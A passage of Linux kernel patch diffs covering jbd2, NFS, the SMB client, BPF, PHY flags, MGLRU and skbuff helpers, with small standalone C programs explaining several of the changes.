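
	pthread_mutex_lock(&lock);
	while (!flush_requested && ok)
		ok = pthread_cond_timedwait(&cond, &lock, &deadline) == 0;
	ok = flush_requested;	/* the predicate decides, not the wakeup */
	pthread_mutex_unlock(&lock);
	return ok;
}

static void *requester(void *arg)
{
	(void)arg;
	pthread_mutex_lock(&lock);
	flush_requested = true;
	pthread_cond_signal(&cond);
	pthread_mutex_unlock(&lock);
	return NULL;
}

int main(void)
{
	pthread_t t;

	pthread_create(&t, NULL, requester, NULL);
	printf("flush %s\n", wait_for_flush(5) ? "requested" : "timed out");
	pthread_join(t, NULL);
	return 0;
}
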
+diff --git a/fs/jbd2/checkpoint.c b/fs/jbd2/checkpoint.c
+index 9ec91017a7f3c..f033ac807013c 100644
+--- a/fs/jbd2/checkpoint.c
++++ b/fs/jbd2/checkpoint.c
+@@ -349,6 +349,8 @@ int jbd2_cleanup_journal_tail(journal_t *journal)
+ 
+ /* Checkpoint list management */
+ 
++enum shrink_type {SHRINK_DESTROY, SHRINK_BUSY_STOP, SHRINK_BUSY_SKIP};
++
+ /*
+  * journal_shrink_one_cp_list
+  *
+@@ -360,7 +362,8 @@ int jbd2_cleanup_journal_tail(journal_t *journal)
+  * Called with j_list_lock held.
+  */
+ static unsigned long journal_shrink_one_cp_list(struct journal_head *jh,
+-						bool destroy, bool *released)
++						enum shrink_type type,
++						bool *released)
+ {
+ 	struct journal_head *last_jh;
+ 	struct journal_head *next_jh = jh;
+@@ -376,12 +379,15 @@ static unsigned long journal_shrink_one_cp_list(struct journal_head *jh,
+ 		jh = next_jh;
+ 		next_jh = jh->b_cpnext;
+ 
+-		if (destroy) {
++		if (type == SHRINK_DESTROY) {
+ 			ret = __jbd2_journal_remove_checkpoint(jh);
+ 		} else {
+ 			ret = jbd2_journal_try_remove_checkpoint(jh);
+-			if (ret < 0)
+-				continue;
++			if (ret < 0) {
++				if (type == SHRINK_BUSY_SKIP)
++					continue;
++				break;
++			}
+ 		}
+ 
+ 		nr_freed++;
+@@ -445,7 +451,7 @@ again:
+ 		tid = transaction->t_tid;
+ 
+ 		freed = journal_shrink_one_cp_list(transaction->t_checkpoint_list,
+-						   false, &released);
++						   SHRINK_BUSY_SKIP, &released);
+ 		nr_freed += freed;
+ 		(*nr_to_scan) -= min(*nr_to_scan, freed);
+ 		if (*nr_to_scan == 0)
+@@ -485,19 +491,21 @@ out:
+ void __jbd2_journal_clean_checkpoint_list(journal_t *journal, bool destroy)
+ {
+ 	transaction_t *transaction, *last_transaction, *next_transaction;
++	enum shrink_type type;
+ 	bool released;
+ 
+ 	transaction = journal->j_checkpoint_transactions;
+ 	if (!transaction)
+ 		return;
+ 
++	type = destroy ? SHRINK_DESTROY : SHRINK_BUSY_STOP;
+ 	last_transaction = transaction->t_cpprev;
+ 	next_transaction = transaction;
+ 	do {
+ 		transaction = next_transaction;
+ 		next_transaction = transaction->t_cpnext;
+ 		journal_shrink_one_cp_list(transaction->t_checkpoint_list,
+-					   destroy, &released);
++					   type, &released);
+ 		/*
+ 		 * This function only frees up some memory if possible so we
+ 		 * dont have an obligation to finish processing. Bail out if
+@@ -631,6 +639,8 @@ int jbd2_journal_try_remove_checkpoint(struct journal_head *jh)
+ {
+ 	struct buffer_head *bh = jh2bh(jh);
+ 
++	if (jh->b_transaction)
++		return -EBUSY;
+ 	if (!trylock_buffer(bh))
+ 		return -EBUSY;
+ 	if (buffer_dirty(bh)) {
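
The shrink_type enum above exists because "not destroying" split into two behaviours: skip past a busy checkpoint entry or stop scanning at it. A toy pruner over an array shows the three-way dispatch (all names illustrative):

#include <stdio.h>

enum shrink_type { SHRINK_DESTROY, SHRINK_BUSY_STOP, SHRINK_BUSY_SKIP };

static int prune(int *items, int n, enum shrink_type type)
{
	int freed = 0;

	for (int i = 0; i < n; i++) {
		int busy = items[i] < 0;	/* negative marks "busy" */

		if (busy && type != SHRINK_DESTROY) {
			if (type == SHRINK_BUSY_SKIP)
				continue;	/* try the next entry */
			break;			/* SHRINK_BUSY_STOP */
		}
		items[i] = 0;			/* "free" the entry */
		freed++;
	}
	return freed;
}

int main(void)
{
	int a[] = { 1, -1, 2, 3 }, b[] = { 1, -1, 2, 3 };

	printf("%d\n", prune(a, 4, SHRINK_BUSY_SKIP)); /* 3: skips the busy one */
	printf("%d\n", prune(b, 4, SHRINK_BUSY_STOP)); /* 1: stops at it */
	return 0;
}
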
+diff --git a/fs/jbd2/recovery.c b/fs/jbd2/recovery.c
+index 8286a9ec122fe..357a3f7632e39 100644
+--- a/fs/jbd2/recovery.c
++++ b/fs/jbd2/recovery.c
+@@ -229,12 +229,8 @@ static int count_tags(journal_t *journal, struct buffer_head *bh)
+ /* Make sure we wrap around the log correctly! */
+ #define wrap(journal, var)						\
+ do {									\
+-	unsigned long _wrap_last =					\
+-		jbd2_has_feature_fast_commit(journal) ?			\
+-			(journal)->j_fc_last : (journal)->j_last;	\
+-									\
+-	if (var >= _wrap_last)						\
+-		var -= (_wrap_last - (journal)->j_first);		\
++	if (var >= (journal)->j_last)					\
++		var -= ((journal)->j_last - (journal)->j_first);	\
+ } while (0)
+ 
+ static int fc_do_one_pass(journal_t *journal,
+@@ -517,9 +513,7 @@ static int do_one_pass(journal_t *journal,
+ 				break;
+ 
+ 		jbd2_debug(2, "Scanning for sequence ID %u at %lu/%lu\n",
+-			  next_commit_ID, next_log_block,
+-			  jbd2_has_feature_fast_commit(journal) ?
+-			  journal->j_fc_last : journal->j_last);
++			  next_commit_ID, next_log_block, journal->j_last);
+ 
+ 		/* Skip over each chunk of the transaction looking
+ 		 * either the next descriptor block or the final commit
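
With fast-commit blocks no longer treated as part of the scan area, wrap() above is back to plain circular arithmetic over [j_first, j_last). A standalone sketch with made-up block numbers:

#include <stdio.h>

/* Wrap a block number around a circular log spanning [first, last). */
static unsigned long wrap(unsigned long block,
			  unsigned long first, unsigned long last)
{
	if (block >= last)
		block -= last - first;
	return block;
}

int main(void)
{
	/* a log occupying blocks [2, 10): walking past the end wraps */
	printf("%lu\n", wrap(9, 2, 10));  /* 9: still inside */
	printf("%lu\n", wrap(10, 2, 10)); /* 2: wraps to the start */
	printf("%lu\n", wrap(12, 2, 10)); /* 4 */
	return 0;
}
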
+diff --git a/fs/nfs/direct.c b/fs/nfs/direct.c
+index cf34d0c309459..3bb530d4bb5ce 100644
+--- a/fs/nfs/direct.c
++++ b/fs/nfs/direct.c
+@@ -474,13 +474,31 @@ out:
+ 	return result;
+ }
+ 
++static void nfs_direct_add_page_head(struct list_head *list,
++				     struct nfs_page *req)
++{
++	struct nfs_page *head = req->wb_head;
++
++	if (!list_empty(&head->wb_list) || !nfs_lock_request(head))
++		return;
++	if (!list_empty(&head->wb_list)) {
++		nfs_unlock_request(head);
++		return;
++	}
++	list_add(&head->wb_list, list);
++	kref_get(&head->wb_kref);
++	kref_get(&head->wb_kref);
++}
++
+ static void nfs_direct_join_group(struct list_head *list, struct inode *inode)
+ {
+ 	struct nfs_page *req, *subreq;
+ 
+ 	list_for_each_entry(req, list, wb_list) {
+-		if (req->wb_head != req)
++		if (req->wb_head != req) {
++			nfs_direct_add_page_head(&req->wb_list, req);
+ 			continue;
++		}
+ 		subreq = req->wb_this_page;
+ 		if (subreq == req)
+ 			continue;
+diff --git a/fs/nfs/pnfs_dev.c b/fs/nfs/pnfs_dev.c
+index ddbbf4fcda867..178001c90156f 100644
+--- a/fs/nfs/pnfs_dev.c
++++ b/fs/nfs/pnfs_dev.c
+@@ -154,7 +154,7 @@ nfs4_get_device_info(struct nfs_server *server,
+ 		set_bit(NFS_DEVICEID_NOCACHE, &d->flags);
+ 
+ out_free_pages:
+-	for (i = 0; i < max_pages; i++)
++	while (--i >= 0)
+ 		__free_page(pages[i]);
+ 	kfree(pages);
+ out_free_pdev:
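
The pnfs_dev loop change above is the classic partial-allocation unwind: on failure at index i, only entries [0, i) were ever allocated, so the old "for (i = 0; i < max_pages; i++)" freed pages that were never obtained. A generic sketch of the corrected pattern (alloc_all is illustrative):

#include <stdio.h>
#include <stdlib.h>

static char **alloc_all(int n)
{
	char **bufs = calloc(n, sizeof(*bufs));
	int i;

	if (!bufs)
		return NULL;
	for (i = 0; i < n; i++) {
		bufs[i] = malloc(64);
		if (!bufs[i])
			goto unwind;
	}
	return bufs;

unwind:
	while (--i >= 0)	/* frees [0, i), never the failed slot */
		free(bufs[i]);
	free(bufs);
	return NULL;
}

int main(void)
{
	char **bufs = alloc_all(4);

	printf("%s\n", bufs ? "allocated" : "failed");
	if (bufs) {
		for (int i = 0; i < 4; i++)
			free(bufs[i]);
		free(bufs);
	}
	return 0;
}
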
+diff --git a/fs/smb/client/cached_dir.c b/fs/smb/client/cached_dir.c
+index bfc964b36c72e..5a132c1e6f6c4 100644
+--- a/fs/smb/client/cached_dir.c
++++ b/fs/smb/client/cached_dir.c
+@@ -218,7 +218,7 @@ int open_cached_dir(unsigned int xid, struct cifs_tcon *tcon,
+ 		.tcon = tcon,
+ 		.path = path,
+ 		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_FILE),
+-		.desired_access = FILE_READ_ATTRIBUTES,
++		.desired_access = FILE_READ_DATA | FILE_READ_ATTRIBUTES,
+ 		.disposition = FILE_OPEN,
+ 		.fid = pfid,
+ 	};
+diff --git a/fs/smb/client/cifs_dfs_ref.c b/fs/smb/client/cifs_dfs_ref.c
+index b0864da9ef434..020e71fe1454e 100644
+--- a/fs/smb/client/cifs_dfs_ref.c
++++ b/fs/smb/client/cifs_dfs_ref.c
+@@ -258,61 +258,23 @@ compose_mount_options_err:
+ 	goto compose_mount_options_out;
+ }
+ 
+-/**
+- * cifs_dfs_do_mount - mounts specified path using DFS full path
+- *
+- * Always pass down @fullpath to smb3_do_mount() so we can use the root server
+- * to perform failover in case we failed to connect to the first target in the
+- * referral.
+- *
+- * @mntpt:		directory entry for the path we are trying to automount
+- * @cifs_sb:		parent/root superblock
+- * @fullpath:		full path in UNC format
+- */
+-static struct vfsmount *cifs_dfs_do_mount(struct dentry *mntpt,
+-					  struct cifs_sb_info *cifs_sb,
+-					  const char *fullpath)
+-{
+-	struct vfsmount *mnt;
+-	char *mountdata;
+-	char *devname;
+-
+-	devname = kstrdup(fullpath, GFP_KERNEL);
+-	if (!devname)
+-		return ERR_PTR(-ENOMEM);
+-
+-	convert_delimiter(devname, '/');
+-
+-	/* TODO: change to call fs_context_for_mount(), fill in context directly, call fc_mount */
+-
+-	/* See afs_mntpt_do_automount in fs/afs/mntpt.c for an example */
+-
+-	/* strip first '\' from fullpath */
+-	mountdata = cifs_compose_mount_options(cifs_sb->ctx->mount_options,
+-					       fullpath + 1, NULL, NULL);
+-	if (IS_ERR(mountdata)) {
+-		kfree(devname);
+-		return (struct vfsmount *)mountdata;
+-	}
+-
+-	mnt = vfs_submount(mntpt, &cifs_fs_type, devname, mountdata);
+-	kfree(mountdata);
+-	kfree(devname);
+-	return mnt;
+-}
+-
+ /*
+  * Create a vfsmount that we can automount
+  */
+-static struct vfsmount *cifs_dfs_do_automount(struct dentry *mntpt)
++static struct vfsmount *cifs_dfs_do_automount(struct path *path)
+ {
++	int rc;
++	struct dentry *mntpt = path->dentry;
++	struct fs_context *fc;
+ 	struct cifs_sb_info *cifs_sb;
+-	void *page;
++	void *page = NULL;
++	struct smb3_fs_context *ctx, *cur_ctx;
++	struct smb3_fs_context tmp;
+ 	char *full_path;
+ 	struct vfsmount *mnt;
+ 
+-	cifs_dbg(FYI, "in %s\n", __func__);
+-	BUG_ON(IS_ROOT(mntpt));
++	if (IS_ROOT(mntpt))
++		return ERR_PTR(-ESTALE);
+ 
+ 	/*
+ 	 * The MSDFS spec states that paths in DFS referral requests and
+@@ -321,29 +283,47 @@ static struct vfsmount *cifs_dfs_do_automount(struct dentry *mntpt)
+ 	 * gives us the latter, so we must adjust the result.
+ 	 */
+ 	cifs_sb = CIFS_SB(mntpt->d_sb);
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_DFS) {
+-		mnt = ERR_PTR(-EREMOTE);
+-		goto cdda_exit;
+-	}
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_DFS)
++		return ERR_PTR(-EREMOTE);
++
++	cur_ctx = cifs_sb->ctx;
++
++	fc = fs_context_for_submount(path->mnt->mnt_sb->s_type, mntpt);
++	if (IS_ERR(fc))
++		return ERR_CAST(fc);
++
++	ctx = smb3_fc2context(fc);
+ 
+ 	page = alloc_dentry_path();
+ 	/* always use tree name prefix */
+ 	full_path = build_path_from_dentry_optional_prefix(mntpt, page, true);
+ 	if (IS_ERR(full_path)) {
+ 		mnt = ERR_CAST(full_path);
+-		goto free_full_path;
++		goto out;
+ 	}
+ 
+-	convert_delimiter(full_path, '\\');
++	convert_delimiter(full_path, '/');
+ 	cifs_dbg(FYI, "%s: full_path: %s\n", __func__, full_path);
+ 
+-	mnt = cifs_dfs_do_mount(mntpt, cifs_sb, full_path);
+-	cifs_dbg(FYI, "%s: cifs_dfs_do_mount:%s , mnt:%p\n", __func__, full_path + 1, mnt);
++	tmp = *cur_ctx;
++	tmp.source = full_path;
++	tmp.UNC = tmp.prepath = NULL;
++
++	rc = smb3_fs_context_dup(ctx, &tmp);
++	if (rc) {
++		mnt = ERR_PTR(rc);
++		goto out;
++	}
++
++	rc = smb3_parse_devname(full_path, ctx);
++	if (!rc)
++		mnt = fc_mount(fc);
++	else
++		mnt = ERR_PTR(rc);
+ 
+-free_full_path:
++out:
++	put_fs_context(fc);
+ 	free_dentry_path(page);
+-cdda_exit:
+-	cifs_dbg(FYI, "leaving %s\n" , __func__);
+ 	return mnt;
+ }
+ 
+@@ -354,9 +334,9 @@ struct vfsmount *cifs_dfs_d_automount(struct path *path)
+ {
+ 	struct vfsmount *newmnt;
+ 
+-	cifs_dbg(FYI, "in %s\n", __func__);
++	cifs_dbg(FYI, "%s: %pd\n", __func__, path->dentry);
+ 
+-	newmnt = cifs_dfs_do_automount(path->dentry);
++	newmnt = cifs_dfs_do_automount(path);
+ 	if (IS_ERR(newmnt)) {
+ 		cifs_dbg(FYI, "leaving %s [automount failed]\n" , __func__);
+ 		return newmnt;
+diff --git a/fs/smb/client/cifsglob.h b/fs/smb/client/cifsglob.h
+index 4a092cc5a3936..03f34ec63e10d 100644
+--- a/fs/smb/client/cifsglob.h
++++ b/fs/smb/client/cifsglob.h
+@@ -734,6 +734,7 @@ struct TCP_Server_Info {
+ 	 */
+ #define CIFS_SERVER_IS_CHAN(server)	(!!(server)->primary_server)
+ 	struct TCP_Server_Info *primary_server;
++	__u16 channel_sequence_num;  /* incremented on primary channel on each chan reconnect */
+ 
+ #ifdef CONFIG_CIFS_SWN_UPCALL
+ 	bool use_swn_dstaddr;
+diff --git a/fs/smb/client/connect.c b/fs/smb/client/connect.c
+index 9cd282960c0bb..57da4f23c1e43 100644
+--- a/fs/smb/client/connect.c
++++ b/fs/smb/client/connect.c
+@@ -1725,6 +1725,7 @@ cifs_get_tcp_session(struct smb3_fs_context *ctx,
+ 		ctx->target_rfc1001_name, RFC1001_NAME_LEN_WITH_NULL);
+ 	tcp_ses->session_estab = false;
+ 	tcp_ses->sequence_number = 0;
++	tcp_ses->channel_sequence_num = 0; /* only tracked for primary channel */
+ 	tcp_ses->reconnect_instance = 1;
+ 	tcp_ses->lstrp = jiffies;
+ 	tcp_ses->compress_algorithm = cpu_to_le16(ctx->compression);
+diff --git a/fs/smb/client/fscache.c b/fs/smb/client/fscache.c
+index f6f3a6b75601b..e73625b5d0cc6 100644
+--- a/fs/smb/client/fscache.c
++++ b/fs/smb/client/fscache.c
+@@ -48,7 +48,7 @@ int cifs_fscache_get_super_cookie(struct cifs_tcon *tcon)
+ 	sharename = extract_sharename(tcon->tree_name);
+ 	if (IS_ERR(sharename)) {
+ 		cifs_dbg(FYI, "%s: couldn't extract sharename\n", __func__);
+-		return -EINVAL;
++		return PTR_ERR(sharename);
+ 	}
+ 
+ 	slen = strlen(sharename);
+diff --git a/fs/smb/client/smb2ops.c b/fs/smb/client/smb2ops.c
+index 6b020d80bb949..1387d5126f53b 100644
+--- a/fs/smb/client/smb2ops.c
++++ b/fs/smb/client/smb2ops.c
+@@ -167,8 +167,17 @@ smb2_set_credits(struct TCP_Server_Info *server, const int val)
+ 
+ 	spin_lock(&server->req_lock);
+ 	server->credits = val;
+-	if (val == 1)
++	if (val == 1) {
+ 		server->reconnect_instance++;
++		/*
++		 * ChannelSequence is updated on the primary channel so that it stays
++		 * consistent across SMB3 requests sent on any channel. See MS-SMB2
++		 * 3.2.4.1 and 3.2.7.1
++		 */
++		if (CIFS_SERVER_IS_CHAN(server))
++			server->primary_server->channel_sequence_num++;
++		else
++			server->channel_sequence_num++;
++	}
+ 	scredits = server->credits;
+ 	in_flight = server->in_flight;
+ 	spin_unlock(&server->req_lock);
+diff --git a/fs/smb/client/smb2pdu.c b/fs/smb/client/smb2pdu.c
+index ae17d78f6ba17..847d69d327c2a 100644
+--- a/fs/smb/client/smb2pdu.c
++++ b/fs/smb/client/smb2pdu.c
+@@ -88,9 +88,20 @@ smb2_hdr_assemble(struct smb2_hdr *shdr, __le16 smb2_cmd,
+ 		  const struct cifs_tcon *tcon,
+ 		  struct TCP_Server_Info *server)
+ {
++	struct smb3_hdr_req *smb3_hdr;
+ 	shdr->ProtocolId = SMB2_PROTO_NUMBER;
+ 	shdr->StructureSize = cpu_to_le16(64);
+ 	shdr->Command = smb2_cmd;
++	if (server->dialect >= SMB30_PROT_ID) {
++		/* After reconnect SMB3 must set ChannelSequence on subsequent reqs */
++		smb3_hdr = (struct smb3_hdr_req *)shdr;
++		/* if primary channel is not set yet, use default channel for chan sequence num */
++		if (CIFS_SERVER_IS_CHAN(server))
++			smb3_hdr->ChannelSequence =
++				cpu_to_le16(server->primary_server->channel_sequence_num);
++		else
++			smb3_hdr->ChannelSequence = cpu_to_le16(server->channel_sequence_num);
++	}
+ 	if (server) {
+ 		spin_lock(&server->req_lock);
+ 		/* Request up to 10 credits but don't go over the limit. */
+diff --git a/fs/smb/common/smb2pdu.h b/fs/smb/common/smb2pdu.h
+index 7d605db3bb3b9..9619015d78f29 100644
+--- a/fs/smb/common/smb2pdu.h
++++ b/fs/smb/common/smb2pdu.h
+@@ -153,6 +153,28 @@ struct smb2_hdr {
+ 	__u8   Signature[16];
+ } __packed;
+ 
++struct smb3_hdr_req {
++	__le32 ProtocolId;	/* 0xFE 'S' 'M' 'B' */
++	__le16 StructureSize;	/* 64 */
++	__le16 CreditCharge;	/* MBZ */
++	__le16 ChannelSequence; /* See MS-SMB2 3.2.4.1 and 3.2.7.1 */
++	__le16 Reserved;
++	__le16 Command;
++	__le16 CreditRequest;	/* CreditResponse */
++	__le32 Flags;
++	__le32 NextCommand;
++	__le64 MessageId;
++	union {
++		struct {
++			__le32 ProcessId;
++			__le32  TreeId;
++		} __packed SyncId;
++		__le64  AsyncId;
++	} __packed Id;
++	__le64  SessionId;
++	__u8   Signature[16];
++} __packed;
++
+ struct smb2_pdu {
+ 	struct smb2_hdr hdr;
+ 	__le16 StructureSize2; /* size of wct area (varies, request specific) */
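
The new smb3_hdr_req above does not change the wire format; it reinterprets the four Status bytes of the response header as ChannelSequence + Reserved in SMB3 requests, per MS-SMB2. A layout check with plain uint types standing in for __le16/__le32 (the struct names are illustrative prefixes, not the full kernel definitions):

#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

struct smb2_hdr_resp_prefix {
	uint32_t ProtocolId;
	uint16_t StructureSize;
	uint16_t CreditCharge;
	uint32_t Status;	/* bytes 8..11 in responses */
	uint16_t Command;
};

struct smb3_hdr_req_prefix {
	uint32_t ProtocolId;
	uint16_t StructureSize;
	uint16_t CreditCharge;
	uint16_t ChannelSequence;	/* aliases the Status bytes */
	uint16_t Reserved;
	uint16_t Command;
};

static_assert(offsetof(struct smb3_hdr_req_prefix, ChannelSequence) ==
	      offsetof(struct smb2_hdr_resp_prefix, Status),
	      "ChannelSequence must alias the Status bytes");
static_assert(offsetof(struct smb3_hdr_req_prefix, Command) ==
	      offsetof(struct smb2_hdr_resp_prefix, Command),
	      "fields after the split must not move");

int main(void)
{
	printf("ChannelSequence at offset %zu\n",
	       offsetof(struct smb3_hdr_req_prefix, ChannelSequence)); /* 8 */
	return 0;
}
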
+diff --git a/include/linux/bpf.h b/include/linux/bpf.h
+index 8cef9ec3a89c2..b3d3aa8437dce 100644
+--- a/include/linux/bpf.h
++++ b/include/linux/bpf.h
+@@ -862,22 +862,18 @@ int arch_prepare_bpf_trampoline(struct bpf_tramp_image *tr, void *image, void *i
+ 				const struct btf_func_model *m, u32 flags,
+ 				struct bpf_tramp_links *tlinks,
+ 				void *orig_call);
+-/* these two functions are called from generated trampoline */
+-u64 notrace __bpf_prog_enter(struct bpf_prog *prog, struct bpf_tramp_run_ctx *run_ctx);
+-void notrace __bpf_prog_exit(struct bpf_prog *prog, u64 start, struct bpf_tramp_run_ctx *run_ctx);
+-u64 notrace __bpf_prog_enter_sleepable(struct bpf_prog *prog, struct bpf_tramp_run_ctx *run_ctx);
+-void notrace __bpf_prog_exit_sleepable(struct bpf_prog *prog, u64 start,
+-				       struct bpf_tramp_run_ctx *run_ctx);
+-u64 notrace __bpf_prog_enter_lsm_cgroup(struct bpf_prog *prog,
+-					struct bpf_tramp_run_ctx *run_ctx);
+-void notrace __bpf_prog_exit_lsm_cgroup(struct bpf_prog *prog, u64 start,
+-					struct bpf_tramp_run_ctx *run_ctx);
+-u64 notrace __bpf_prog_enter_struct_ops(struct bpf_prog *prog,
+-					struct bpf_tramp_run_ctx *run_ctx);
+-void notrace __bpf_prog_exit_struct_ops(struct bpf_prog *prog, u64 start,
+-					struct bpf_tramp_run_ctx *run_ctx);
++u64 notrace __bpf_prog_enter_sleepable_recur(struct bpf_prog *prog,
++					     struct bpf_tramp_run_ctx *run_ctx);
++void notrace __bpf_prog_exit_sleepable_recur(struct bpf_prog *prog, u64 start,
++					     struct bpf_tramp_run_ctx *run_ctx);
+ void notrace __bpf_tramp_enter(struct bpf_tramp_image *tr);
+ void notrace __bpf_tramp_exit(struct bpf_tramp_image *tr);
++typedef u64 (*bpf_trampoline_enter_t)(struct bpf_prog *prog,
++				      struct bpf_tramp_run_ctx *run_ctx);
++typedef void (*bpf_trampoline_exit_t)(struct bpf_prog *prog, u64 start,
++				      struct bpf_tramp_run_ctx *run_ctx);
++bpf_trampoline_enter_t bpf_trampoline_enter(const struct bpf_prog *prog);
++bpf_trampoline_exit_t bpf_trampoline_exit(const struct bpf_prog *prog);
+ 
+ struct bpf_ksym {
+ 	unsigned long		 start;
+diff --git a/include/linux/bpf_verifier.h b/include/linux/bpf_verifier.h
+index 0eb8f035b3d9f..1a32baa78ce26 100644
+--- a/include/linux/bpf_verifier.h
++++ b/include/linux/bpf_verifier.h
+@@ -648,4 +648,17 @@ static inline enum bpf_prog_type resolve_prog_type(const struct bpf_prog *prog)
+ 		prog->aux->dst_prog->type : prog->type;
+ }
+ 
++static inline bool bpf_prog_check_recur(const struct bpf_prog *prog)
++{
++	switch (resolve_prog_type(prog)) {
++	case BPF_PROG_TYPE_TRACING:
++		return prog->expected_attach_type != BPF_TRACE_ITER;
++	case BPF_PROG_TYPE_STRUCT_OPS:
++	case BPF_PROG_TYPE_LSM:
++		return false;
++	default:
++		return true;
++	}
++}
++
+ #endif /* _LINUX_BPF_VERIFIER_H */
+diff --git a/include/linux/ipv6.h b/include/linux/ipv6.h
+index 37dfdcfcdd542..15d7529ac9534 100644
+--- a/include/linux/ipv6.h
++++ b/include/linux/ipv6.h
+@@ -146,6 +146,7 @@ struct inet6_skb_parm {
+ #define IP6SKB_JUMBOGRAM      128
+ #define IP6SKB_SEG6	      256
+ #define IP6SKB_FAKEJUMBO      512
++#define IP6SKB_MULTIPATH      1024
+ };
+ 
+ #if defined(CONFIG_NET_L3_MASTER_DEV)
+diff --git a/include/linux/micrel_phy.h b/include/linux/micrel_phy.h
+index 1f7c33b2f5a3f..e164facb0f363 100644
+--- a/include/linux/micrel_phy.h
++++ b/include/linux/micrel_phy.h
+@@ -38,9 +38,9 @@
+ #define	PHY_ID_KSZ9477		0x00221631
+ 
+ /* struct phy_device dev_flags definitions */
+-#define MICREL_PHY_50MHZ_CLK	0x00000001
+-#define MICREL_PHY_FXEN		0x00000002
+-#define MICREL_KSZ8_P1_ERRATA	0x00000003
++#define MICREL_PHY_50MHZ_CLK	BIT(0)
++#define MICREL_PHY_FXEN		BIT(1)
++#define MICREL_KSZ8_P1_ERRATA	BIT(2)
+ 
+ #define MICREL_KSZ9021_EXTREG_CTRL	0xB
+ #define MICREL_KSZ9021_EXTREG_DATA_WRITE	0xC
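
The micrel change matters because 0x00000003 is bit 0 | bit 1, so testing MICREL_KSZ8_P1_ERRATA with & also fired when only the 50MHz-clock or fiber-mode flags were set. A small demonstration (macro names shortened for the sketch):

#include <stdio.h>

#define BIT(n)		(1U << (n))

#define OLD_ERRATA	0x00000003	/* the buggy value: bits 0 and 1 */
#define PHY_50MHZ_CLK	BIT(0)
#define PHY_FXEN	BIT(1)
#define KSZ8_P1_ERRATA	BIT(2)		/* the fixed, distinct bit */

int main(void)
{
	unsigned int flags = PHY_50MHZ_CLK;	/* errata NOT requested */

	/* old encoding: the test fires anyway — a false positive */
	printf("old: %s\n", (flags & OLD_ERRATA) ? "errata applied" : "ok");
	/* new encoding: only bit 2 means the errata workaround */
	printf("new: %s\n", (flags & KSZ8_P1_ERRATA) ? "errata applied" : "ok");
	return 0;
}
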
+diff --git a/include/linux/mm_inline.h b/include/linux/mm_inline.h
+index e8ed225d8f7ca..4ef6c09cc2eec 100644
+--- a/include/linux/mm_inline.h
++++ b/include/linux/mm_inline.h
+@@ -256,9 +256,9 @@ static inline bool lru_gen_add_folio(struct lruvec *lruvec, struct folio *folio,
+ 	lru_gen_update_size(lruvec, folio, -1, gen);
+ 	/* for folio_rotate_reclaimable() */
+ 	if (reclaiming)
+-		list_add_tail(&folio->lru, &lrugen->lists[gen][type][zone]);
++		list_add_tail(&folio->lru, &lrugen->folios[gen][type][zone]);
+ 	else
+-		list_add(&folio->lru, &lrugen->lists[gen][type][zone]);
++		list_add(&folio->lru, &lrugen->folios[gen][type][zone]);
+ 
+ 	return true;
+ }
+diff --git a/include/linux/mmzone.h b/include/linux/mmzone.h
+index 5f74891556f33..323ee36df683e 100644
+--- a/include/linux/mmzone.h
++++ b/include/linux/mmzone.h
+@@ -312,7 +312,7 @@ enum lruvec_flags {
+  * They form a sliding window of a variable size [MIN_NR_GENS, MAX_NR_GENS]. An
+  * offset within MAX_NR_GENS, i.e., gen, indexes the LRU list of the
+  * corresponding generation. The gen counter in folio->flags stores gen+1 while
+- * a page is on one of lrugen->lists[]. Otherwise it stores 0.
++ * a page is on one of lrugen->folios[]. Otherwise it stores 0.
+  *
+  * A page is added to the youngest generation on faulting. The aging needs to
+  * check the accessed bit at least twice before handing this page over to the
+@@ -324,8 +324,8 @@ enum lruvec_flags {
+  * rest of generations, if they exist, are considered inactive. See
+  * lru_gen_is_active().
+  *
+- * PG_active is always cleared while a page is on one of lrugen->lists[] so that
+- * the aging needs not to worry about it. And it's set again when a page
++ * PG_active is always cleared while a page is on one of lrugen->folios[] so
++ * that the aging needs not to worry about it. And it's set again when a page
+  * considered active is isolated for non-reclaiming purposes, e.g., migration.
+  * See lru_gen_add_folio() and lru_gen_del_folio().
+  *
+@@ -412,7 +412,7 @@ struct lru_gen_struct {
+ 	/* the birth time of each generation in jiffies */
+ 	unsigned long timestamps[MAX_NR_GENS];
+ 	/* the multi-gen LRU lists, lazily sorted on eviction */
+-	struct list_head lists[MAX_NR_GENS][ANON_AND_FILE][MAX_NR_ZONES];
++	struct list_head folios[MAX_NR_GENS][ANON_AND_FILE][MAX_NR_ZONES];
+ 	/* the multi-gen LRU sizes, eventually consistent */
+ 	long nr_pages[MAX_NR_GENS][ANON_AND_FILE][MAX_NR_ZONES];
+ 	/* the exponential moving average of refaulted */
+diff --git a/include/linux/skbuff.h b/include/linux/skbuff.h
+index cc5ed2cf25f65..2feee144fc0ef 100644
+--- a/include/linux/skbuff.h
++++ b/include/linux/skbuff.h
+@@ -261,6 +261,14 @@
+ #define SKB_DATA_ALIGN(X)	ALIGN(X, SMP_CACHE_BYTES)
+ #define SKB_WITH_OVERHEAD(X)	\
+ 	((X) - SKB_DATA_ALIGN(sizeof(struct skb_shared_info)))
++
++/* For X bytes available in skb->head, what is the minimal
++ * allocation needed, knowing struct skb_shared_info needs
++ * to be aligned.
++ */
++#define SKB_HEAD_ALIGN(X) (SKB_DATA_ALIGN(X) + \
++	SKB_DATA_ALIGN(sizeof(struct skb_shared_info)))
++
+ #define SKB_MAX_ORDER(X, ORDER) \
+ 	SKB_WITH_OVERHEAD((PAGE_SIZE << (ORDER)) - (X))
+ #define SKB_MAX_HEAD(X)		(SKB_MAX_ORDER((X), 0))
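
SKB_HEAD_ALIGN() above answers: for X usable bytes in skb->head, how large must the allocation be once the payload is rounded to a cache line and an aligned skb_shared_info is appended? A sketch with a stand-in shinfo size (the kernel uses sizeof(struct skb_shared_info)):

#include <stdio.h>

#define SMP_CACHE_BYTES		64
#define ALIGN_UP(x, a)		(((x) + (a) - 1) & ~((a) - 1))
#define SKB_DATA_ALIGN(x)	ALIGN_UP(x, SMP_CACHE_BYTES)

#define SHINFO_SIZE		320	/* illustrative, not the real size */

#define SKB_HEAD_ALIGN(x)	(SKB_DATA_ALIGN(x) + SKB_DATA_ALIGN(SHINFO_SIZE))

int main(void)
{
	/* asking for 100 usable bytes really needs 128 + 320 = 448 here */
	printf("%d\n", SKB_HEAD_ALIGN(100));
	return 0;
}
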
+diff --git a/include/linux/tca6416_keypad.h b/include/linux/tca6416_keypad.h
